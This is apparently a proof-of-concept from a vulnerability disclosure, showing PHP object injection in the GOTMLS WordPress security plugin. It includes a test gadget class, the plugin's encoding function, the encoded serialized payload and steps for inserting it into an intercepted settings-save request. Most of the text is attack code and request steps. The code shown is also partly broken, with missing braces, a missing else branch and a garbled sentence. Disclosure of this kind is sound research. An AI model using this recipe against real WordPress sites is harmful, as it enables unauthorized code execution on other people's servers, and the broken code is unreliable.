1. To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");

2. Create and execute file php to encode the content: O:4:"Evil":0:{} with the GOTMLS_encode() function located at /wordpress/wp-content/plugins/gotmls/images/index.php:

function GOTMLS_encode($unencoded_string) {
	if (function_exists("base64_encode"))
		$encoded_string = base64_encode($unencoded_string);
	elseif (function_exists("mb_convert_encoding"))
		$encoded_string = mb_convert_encoding($unencoded_string, "BASE64", "UTF-8");
		$encoded_string = "Cannot encode: $unencoded_string function_exists: ";
	$encoded_array = explode("=", $encoded_string."=");
	return strtr($encoded_array[0], "+/0", "-_=").(count($encoded_array)-1);
$content = 'O:4:"Evil":0:{};';
echo "Encoded content: ".GOTMLS_encode($content);
//Encoded content: Tzo=OiJFdmlsIjowOnt9Ow3

3. After activating the plugin, click the "Save Settings" button, intercept this request and add the parameter "UPDATE_definitions_array" with encoded content: Tzo=OiJFdmlsIjowOnt9Ow3 in the body request.


The view the response of the request made, which will have the "Arbitrary deserialization" message:

POST /wp-admin/admin.php?page=GOTMLS-settings HTTP/1.1
